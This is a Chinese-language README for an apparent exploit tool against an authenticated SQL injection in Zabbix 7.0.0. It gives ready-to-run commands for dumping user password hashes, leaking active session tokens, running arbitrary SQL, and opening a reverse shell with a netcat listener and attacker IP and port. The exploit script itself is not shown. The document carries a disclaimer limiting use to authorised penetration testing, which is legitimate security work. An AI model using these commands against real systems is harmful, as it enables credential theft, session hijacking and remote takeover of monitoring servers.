一个Python脚本,用于利用 Zabbix 7.0.0 的已认证SQL注入漏洞,支持多种操作模式,包括用户数据提取、会话令牌泄露、远程命令执行(RCE)以及自定义查询注入。
⚠️ 免责声明:
本脚本仅供 教育 和 授权渗透测试 目的使用。
请 勿 将其用于您不拥有或未经明确许可进行测试的系统。
作者不对任何因使用本工具而导致的误用或损害负责。
requests 库如需安装依赖:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [可选参数...]
| 模式 |
|---|
导出用户哈希
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
泄露会话令牌
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
远程命令执行(反向shell)
# 首先启动监听器:
nc -lvnp 9001
# 然后运行:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
自定义SQL注入
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # 主要的利用脚本
README.md # 本文档
Anthony (@874anthony)
用热爱与好奇精心打造 🐍
本项目采用 MIT 许可证发布。请负责任地使用。
| 描述 |
|---|
| 是否需要管理员令牌 |
|---|
| leak-users | 导出所有用户ID、用户名、密码哈希及角色 | ❌ |
| leak-tokens | 从数据库导出所有活跃会话ID | ❌ |
| rce | 通过 item.create 漏洞生成反向shell | ✅ |
| custom | 通过注入执行任意自定义SQL查询 | ❌ |